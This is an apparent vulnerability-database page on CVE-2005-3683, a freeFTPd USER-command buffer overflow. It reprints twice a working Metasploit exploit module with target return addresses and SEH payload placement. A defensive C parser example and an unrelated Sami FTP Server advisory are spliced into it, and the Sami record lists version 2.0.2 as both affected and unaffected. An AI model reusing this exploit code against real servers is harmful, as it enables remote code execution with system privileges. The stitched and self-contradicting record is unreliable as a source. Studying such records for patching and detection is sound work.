CVE-2005-3683
CVSS 7.5
Published: 2005-11-18 20:03:00
Revised: 2016-10-17 23:36:52

[Original] Stack-based buffer overflow in freeFTPd before 1.0.9 with Logging enabled, allows remote attackers to cause a denial of service (application crash), and possibly execute arbitrary code, via a long USER command.


[CNNVD] FreeFTPD USER Command Buffer Overflow Vulnerability (CNNVD-200511-234)

        FreeFTPd is a free FTP+SSL/SFTP server built on the WeOnlyDo FTP/SFTP implementation.
        FreeFTPd contains a buffer overflow vulnerability caused by improper validation of user input. An attacker who successfully exploits it can crash the server or execute arbitrary code with system privileges.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:freeftpd:freeftpd:1.0.2
cpe:/a:freeftpd:freeftpd:1.0.1
cpe:/a:freeftpd:freeftpd:1.0
cpe:/a:freeftpd:freeftpd:1.0.6
cpe:/a:freeftpd:freeftpd:1.0.5
cpe:/a:freeftpd:freeftpd:1.0.4
cpe:/a:freeftpd:freeftpd:1.0.3
cpe:/a:freeftpd:freeftpd:1.0.8
cpe:/a:freeftpd:freeftpd:1.0.7

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3683
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3683
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-234
(official data source) CNNVD

- Other links and resources

http://freeftpd.com/?ctt=changelog
(UNKNOWN)  CONFIRM  http://freeftpd.com/?ctt=changelog
http://marc.info/?l=full-disclosure&m=113213763821294&w=2
(UNKNOWN)  FULLDISC  20051116 freeftpd USER bufferoverflow
http://marc.info/?l=full-disclosure&m=113216611924774&w=2
(UNKNOWN)  FULLDISC  20051116 re: freeftpd USER bufferoverflow
http://securitytracker.com/id?1015230
(VENDOR_ADVISORY)  SECTRACK  1015230
http://www.securityfocus.com/bid/15457
(UNKNOWN)  BID  15457
http://www.vupen.com/english/advisories/2005/2458
(UNKNOWN)  VUPEN  ADV-2005-2458
http://xforce.iss.net/xforce/xfdb/23118
(UNKNOWN)  XF  freeftpd-multiple-command-bo(23118)

- Vulnerability information

FreeFTPD USER Command Buffer Overflow Vulnerability
High severity  Buffer overflow
2005-11-18 00:00:00 2005-11-22 00:00:00
Remote
        FreeFTPd is a free FTP+SSL/SFTP server built on the WeOnlyDo FTP/SFTP implementation.
        FreeFTPd contains a buffer overflow vulnerability caused by improper validation of user input. An attacker who successfully exploits it can crash the server or execute arbitrary code with system privileges.

- Advisories and patches

        The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
        http://freeftpd.com/

- Vulnerability information (16707)

freeFTPd 1.0 Username Overflow (EDBID:16707)
windows remote
2010-07-03 Verified
0 metasploit
N/A
##
# $Id: freeftpd_user.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'freeFTPd 1.0 Username Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the freeFTPd
				multi-protocol file transfer service. This flaw can only be
				exploited when logging has been enabled (non-default).
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '2005-3683'],
					[ 'OSVDB', '20909'],
					[ 'BID', '15457'],
					[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Windows 2000 English ALL',
						{
							'Platform' => 'win',
							'Ret'      => 0x75022ac4,
						},
					],
					[
						'Windows XP Pro SP0/SP1 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x71aa32ad,
						},
					],
					[
						'Windows NT SP5/SP6a English',
						{
							'Platform' => 'win',
							'Ret'      => 0x776a1799,
						},
					],
					[
						'Windows 2003 Server English',
						{
							'Platform' => 'win',
							'Ret'      => 0x7ffc0638,
						},
					],
				],
			'DisclosureDate'  => 'Nov 16 2005'
		))
	end

	def check
		connect
		disconnect
		if (banner =~ /freeFTPd 1\.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = rand_text_english(1816, payload_badchars)
		seh          = generate_seh_payload(target.ret)
		buf[1008, seh.length] = seh

		send_cmd( ['USER', buf] , false)

		handler
		disconnect
	end

end
		

- Vulnerability information (F83039)

freeFTPd 1.0 Username Overflow (PacketStormID:F83039)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,protocol
CVE-2005-3683

This Metasploit module exploits a stack overflow in the freeFTPd multi-protocol file transfer service. This flaw can only be exploited when logging has been enabled (non-default).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'freeFTPd 1.0 Username Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the freeFTPd
				multi-protocol file transfer service. This flaw can only be
				exploited when logging has been enabled (non-default).
					
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-3683'],
					[ 'OSVDB', '20909'],
					[ 'BID', '15457'],
					[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 
						'Windows 2000 English ALL',
						{
							'Platform' => 'win',
							'Ret'      => 0x75022ac4,
						},
					],
					[ 
						'Windows XP Pro SP0/SP1 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x71aa32ad,
						},
					],
					[ 
						'Windows NT SP5/SP6a English',
						{
							'Platform' => 'win',
							'Ret'      => 0x776a1799,
						},
					],
					[ 
						'Windows 2003 Server English',
						{
							'Platform' => 'win',
							'Ret'      => 0x7ffc0638,
						},
					],
				]))
	end

	def check
		connect
		disconnect
		if (banner =~ /freeFTPd 1\.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = rand_text_english(1816, payload_badchars)
		seh          = generate_seh_payload(target.ret) 
		buf[1008, seh.length] = seh

		send_cmd( ['USER', buf] , false)

		handler
		disconnect
	end

end
    

- Vulnerability information

20909
freeFTPd Multiple Command Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability description

A remote overflow exists in freeFTPd. The 'USER', 'MKD' and 'DELE' commands fail to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long string to the commands, a remote attacker can cause the daemon to crash resulting in a loss of availability.
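The description above says the USER, MKD and DELE handlers copy their argument without a bounds check. The following C program is an added illustration of what a bounded handler for those three commands looks like; it is not freeFTPd's code and not part of this record. The argument limit (MAX_ARG_LEN), the log-line size and the sample inputs are assumptions chosen for the example. The point it demonstrates is that the length check happens before any copy, the over-long argument is rejected rather than silently truncated, and the log line (the path the CVE text says must be enabled for the crash) is formatted with snprintf into a fixed buffer.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed policy limit for this example, not freeFTPd's own value. */
#define MAX_ARG_LEN 256
#define LOG_LINE_LEN 512

enum cmd_status { CMD_OK = 0, CMD_TOO_LONG = 1, CMD_MALFORMED = 2, CMD_UNKNOWN = 3 };

struct ftp_cmd {
    char verb[5];               /* FTP verbs are at most 4 letters */
    char arg[MAX_ARG_LEN + 1];  /* always NUL-terminated */
};

/* Parse one control-connection line ("VERB arg\r\n") for the three verbs
 * the advisory names.  Every copy is bounded by the destination size and
 * an over-long argument is refused before anything is written to out->arg,
 * so a caller never receives a truncated value it might treat as valid. */
enum cmd_status parse_ftp_cmd(const char *line, struct ftp_cmd *out)
{
    static const char *const guarded[] = { "USER", "MKD", "DELE" };
    const size_t nguarded = sizeof guarded / sizeof guarded[0];
    const char *end = line + strcspn(line, "\r\n");   /* drop terminator */
    const char *sp = memchr(line, ' ', (size_t)(end - line));
    size_t verb_len = sp ? (size_t)(sp - line) : (size_t)(end - line);
    size_t arg_len, i;

    memset(out, 0, sizeof *out);
    if (verb_len == 0 || verb_len >= sizeof out->verb)
        return CMD_MALFORMED;
    for (i = 0; i < verb_len; i++)
        out->verb[i] = (char)toupper((unsigned char)line[i]);
    out->verb[verb_len] = '\0';

    for (i = 0; i < nguarded; i++)
        if (strcmp(out->verb, guarded[i]) == 0)
            break;
    if (i == nguarded)
        return CMD_UNKNOWN;

    if (!sp)
        return CMD_MALFORMED;       /* USER, MKD and DELE all take an argument */
    arg_len = (size_t)(end - (sp + 1));
    if (arg_len == 0)
        return CMD_MALFORMED;
    if (arg_len > MAX_ARG_LEN)
        return CMD_TOO_LONG;        /* reject; do not truncate into the buffer */
    memcpy(out->arg, sp + 1, arg_len);
    out->arg[arg_len] = '\0';
    return CMD_OK;
}

/* Build the log line with snprintf, which never writes past buflen.
 * Returns 1 if the whole line fit, 0 if it was truncated. */
int format_log_line(const char *peer, const struct ftp_cmd *cmd,
                    char *buf, size_t buflen)
{
    int n = snprintf(buf, buflen, "%s %s %s", peer, cmd->verb, cmd->arg);
    return n >= 0 && (size_t)n < buflen;
}

int main(void)
{
    struct ftp_cmd cmd;
    char logline[LOG_LINE_LEN];
    char big[3000];

    /* constructed sample: an ordinary login */
    printf("USER alice -> %d\n", parse_ftp_cmd("USER alice\r\n", &cmd));
    if (format_log_line("10.0.0.5", &cmd, logline, sizeof logline))
        printf("log: %s\n", logline);

    /* constructed sample: a 2000-byte username, the shape of input the
     * advisory describes; it is refused before any copy takes place */
    memset(big, 'A', sizeof big);
    memcpy(big, "USER ", 5);
    memcpy(big + 2005, "\r\n", 2);
    big[2007] = '\0';
    printf("long USER -> %d\n", parse_ftp_cmd(big, &cmd));
    return 0;
}
```

Rejecting rather than truncating matters for MKD and DELE as well: a silently shortened path would operate on a different file than the client named. The same parser shape applies to any fixed-size command buffer in a network daemon.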

- Timeline

2005-11-16 Unknown
2005-11-16 Unknown

- Solution

Upgrade to version 1.0.9 or higher, as it has been reported to fix the USER command vulnerability. However, the upgrade does not fix the MKD and DELE command vulnerabilities.

- References

- Vulnerability author

- Vulnerability information

Sami FTP Server User Command Buffer Overflow Vulnerability
Boundary Condition Error 16370
Yes No
2006-01-24 12:00:00 2008-02-19 06:25:00
Critical Security is credited with the discovery of this vulnerability.

- Affected program versions

KarjaSoft Sami FTP Server 2.0.1
KarjaSoft Sami FTP Server 2.0.2

- Unaffected program versions

KarjaSoft Sami FTP Server 2.0.2

- Vulnerability discussion

Sami FTP Server is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before storing it in a finite-sized buffer.

An attacker can exploit this issue to execute arbitrary machine code in the context of the affected server application. This likely occurs with SYSTEM-level privileges.

Sami FTP Server 2.0.1 is affected by this issue; other versions may also be affected.

UPDATE (February 15, 2008): This issue was reported again in a message to Bugtraq. The message states that 2.0.* is vulnerable, implying that the fixed version may still be affected. However, this has not been confirmed.

- Exploit

The following exploit is available:

- Solution

The vendor has released Sami FTP Server 2.0.2 to address this issue.


KarjaSoft Sami FTP Server 2.0.1

- References

 

 
